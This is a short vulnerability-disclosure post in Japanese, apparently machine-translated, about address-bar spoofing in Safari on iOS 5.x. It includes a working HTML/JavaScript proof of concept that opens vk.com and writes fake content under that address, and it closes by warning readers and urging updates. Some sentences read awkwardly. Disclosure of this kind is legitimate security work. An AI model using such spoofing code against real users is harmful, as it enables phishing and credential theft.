iOS 5.0.1、5.1、5.1.1のSafariブラウザーの脆弱性

このトピックはすでにここで対処されています: http : //habrahabr.ru/post/140743/





私はコードを少し書き直しました、そして、これは私が得たものです:



スクリーンショット:









コード自体:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html> <body> <center><a href="http://vk.com" onclick="poc()"><h1>  vk.com</h1></a></center> <script type="text/javascript"> function poc() { win=window.open('http://vk.com'); win.document.write("<center><h1>  </h1></center>"); return false; } </script> </body> </html>
      
      







動作:偽のページで新しいタブを開き、古いタブではリンクが指すサイトを開きます。

iPhoneでは、古いタブで新しいページが開いていることに気付くのは非常に困難です。なぜなら、 彼女は目から隠れています。 iPadでは、これは簡単です。新しいタブを開いた後、次のタブは切り替えたばかりのサイトを疑わしく更新します。



結論:リンクを非常に慎重にたどる必要があります。そうしないと、ページのソースコードを表示したり、細心の注意を払ってjsスクリプトを使用したブックマークを使用するだけで、iデバイスから検出できる偽のページに遭遇する可能性があります:)もちろん、システムを時間通りに更新してください。



UPD:画像ホスティングを置き換えました。



All Articles